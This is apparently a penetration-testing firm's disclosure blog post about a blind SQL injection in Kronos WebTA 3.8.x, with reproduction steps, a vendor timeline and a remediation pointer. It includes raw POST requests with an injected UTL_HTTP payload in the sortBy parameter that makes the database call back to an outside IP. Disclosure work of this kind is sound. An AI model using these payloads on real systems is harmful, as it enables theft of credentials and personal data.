Critical WebTA SQLi Vulnerability Discovery Details
This blog covers a recent security vulnerability found by a team of Pen Testers at MindPoint Group during a customer engagement. We’ll walk through the issue descriptions, steps to reproduce the vulnerability, and our recommendations for remediating.
Common Vulnerability Exploit (CVE):
- Risk: High
- Difficulty to Exploit: Easy
Kronos Web Time and Attendance (WebTA)
Kronos WebTA 3.8.x and later 3.x versions before 4.0. The latest release of Kronos WebTA is not affected.
Elwood Buck & Dorian Aylward
Blind SQL Injection (SQLI) vulnerability in Kronos WebTA v3.8.x affecting the “com.threeis.webta.H352premPayRequest” servlet allows an attacker with the Employee, Supervisor, or Timekeeper role to read sensitive data from the database.
SQLI is an injection attack that makes it possible to execute malicious SQL statements against the backend Database (DB) server. It is used to read sensitive data from the DB, modify DB data, execute admin operations on the database (such as shutting down the DBMS), recover files on the DBMS file system and, in some cases, issues commands on the DB server.
Blind SQLI vulnerability in WebTA v3.8.x affecting the “com.threeis.webta.H352premPayRequest” servlet allows an attacker with Employee, Supervisor, or Timekeeper role to read sensitive data from the database. An attacker can modify parameters of the POST request sent to the servlet to overwrite the values in the ‘sortBy’ parameter to conduct malicious SQL queries.
Steps to Reproduce:
Our first WebTA engagement led to privilege escalation vulnerabilities, which consumed most of our time. During our second attempt at testing the WebTA timekeeping application, we were able to trigger some interesting SQL errors that ultimately lead to data extraction from the underlying database. At first glance, the application appeared well-defended from such attacks. However, after submitting various leave requests within the application, new options and the ability to sort said requests became available. Don’t forget to submit your forms..and your timesheet!
To exploit this vulnerability, you need to have the role of Employee, Timekeeper, or Supervisor.
To start, a leave request must be submitted so that the filter icons appear. After navigating to the leave request menu, select the ‘+’ icon next to ‘Request Type’. Web Request(s):
Navigate to the leave and premium pay requests POST /servlet/com.threeis.webta.H351leavePremReqMenu HTTP/1.1 selFunc=leaveReq
Select ‘+’ icon next to the ‘Request Type’ POST /servlet/com.threeis.webta.H352premPayRequest HTTP/1.1 selFunc=changeview&selRow=&selEmpId=&selDate=&sortBy=leaveReq
After selecting the ‘+’ icon in the previous step, proxy the request so that the parameter values can be manipulated. Replace the existing value in the ‘sortBy’ parameter with the following query (replacing IP addresses where necessary) to showcase the ability to make user-controlled, database queries. You will need to have an accessible web server under your control to verify that the server makes a web request. We stood up a simple web server using python, but you can also use burp collaborator:
(SELECT UTL_HTTP.REQUEST(‘http://126.96.36.199:8000/test.html’) FROM DUAL)
Embed the malicious SQL query in the ‘sortBy’ parameter
POST /servlet/com.threeis.webta.H352premPayRequest HTTP/1.1
selFunc=changeview&selRow=&selEmpId=&selDate=&sortBy=(SELECT UTL_HTTP.REQUEST(‘http://188.8.131.52:8000/test.html’) FROM DUAL)
After demonstrating the PoC above, we ran the POST request through SQL map and extracted: usernames, passwords, SSNs, names, and addresses.
Follow OWASP’s guidance for SQLi vulnerabilities.
2/13/2020 – Vendor notified
2/24/2020 – Patch released and fixes verified
2/28/2020 – Vendor notified of intent to publicly disclose
6/5/2020 – Vendor requests modifications to public disclosure content
Our Pen Testing Services
The vulnerability listed above was an unknown vulnerability, found during one of our pen testing engagements. MindPoint Group offers a variety of Security Operations services (like pen testing) to help your organization identify and mitigate risk and defend against ever-growing threats. Contact us to learn more.